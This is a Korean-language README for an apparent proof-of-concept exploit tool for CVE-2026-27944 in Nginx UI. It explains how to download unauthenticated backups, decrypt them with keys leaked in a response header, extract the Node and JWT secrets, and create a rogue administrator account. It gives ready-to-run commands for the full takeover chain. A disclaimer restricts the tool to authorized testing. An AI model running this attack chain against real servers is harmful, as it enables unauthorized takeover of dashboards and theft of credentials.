
CVE-2026-27944 Nginx UI 자동 익스플로잇: 백업을 다운로드하고 복호화하여 비밀 정보를 추출하고, 악성 관리자 계정을 생성해 대시보드를 완전히 장악합니다.
이 저장소는 Nginx UI의 치명적인 취약점인 CVE-2026-27944에 대한 향상된 개념 증명(POC) 익스플로잇을 포함하고 있습니다.
이 취약점은 인증되지 않은 공격자가 /api/backup 엔드포인트를 통해 시스템 백업을 다운로드할 수 있게 합니다. 또한, 애플리케이션은 X-Backup-Security HTTP 응답 헤더 내부에 AES-256 암호화 키와 IV를 노출하여, 공격자가 다운로드한 백업을 쉽게 복호화할 수 있게 합니다.
이 향상된 POC는 백업 다운로드, 콘텐츠 복호화, 구성 비밀번호(예: Node Secret 및 JWT Secret) 추출, 그리고 해당 비밀번호를 활용한 인증 우회 및 전체 대시보드 장악을 위한 rogue 관리자 계정 생성까지 전체 공격 체인을 자동화합니다.
이 도구는 교육 목적 및 승인된 침투 테스트 전용입니다. 소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 이 도구를 사용하지 마십시오. 저자는 이 스크립트로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.
X-Backup-Security 헤더를 파싱하여 Base64로 인코딩된 AES 키와 IV를 추출하고 백업을 복호화합니다(AES-256-CBC).app.ini를 자동으로 파싱하여 민감한 정보를 추출합니다:
X-Node-Secret 헤더)을 사용하여 API와 상호 작용하고 새 관리자 사용자를 생성합니다.pycryptodome 라이브러리(AES 복호화에 필요)저장소를 클론합니다:
git clone https://github.com/Skynoxk/CVE-2026-27944-POC.git
cd CVE-2026-27944-POC
필요한 종속성을 설치합니다:
pip install pycryptodome
python exploit_enhanced.py --target <URL> [OPTIONS]
1. 백업 다운로드 및 복호화만 수행:
python exploit_enhanced.py --target http://127.0.0.1:9000 --out backup.bin --decrypt
2. 다운로드, 복호화 및 구성 비밀번호 추출:
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --show-secrets
3. 전체 익스플로잇 체인 (다운로드, 복호화, 비밀번호 추출 및 관리자 생성):
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --create-user hacker --password Pwned@123!
--create-user 플래그가 성공적으로 사용되면, 스크립트는 Nginx UI 대시보드에 접근하는 상세한 방법을 출력합니다:
authorization 쿠키 설정.X-Node-Secret 헤더를 사용한 curl 명령으로 인증 메커니즘 우회.| 인수 | 설명 | 기본값 |
|---|
--target | (필수) Nginx UI 인스턴스의 기본 URL (예: http://127.0.0.1:9000) | |
--out | 암호화된 백업을 저장할 파일 경로 | backup.bin |
--decrypt | 다운로드한 백업 복호화 | False |
--extract-dir | 복호화된 파일을 추출할 디렉토리 | backup_extracted |
--show-secrets | app.ini에서 민감한 비밀번호 추출 및 표시 | False |
--create-user | 대시보드 접근을 위한 관리자 사용자 생성 (사용자 이름 지정) | |
--password | 새로 생성된 관리자 사용자의 비밀번호 | Admin@123456 |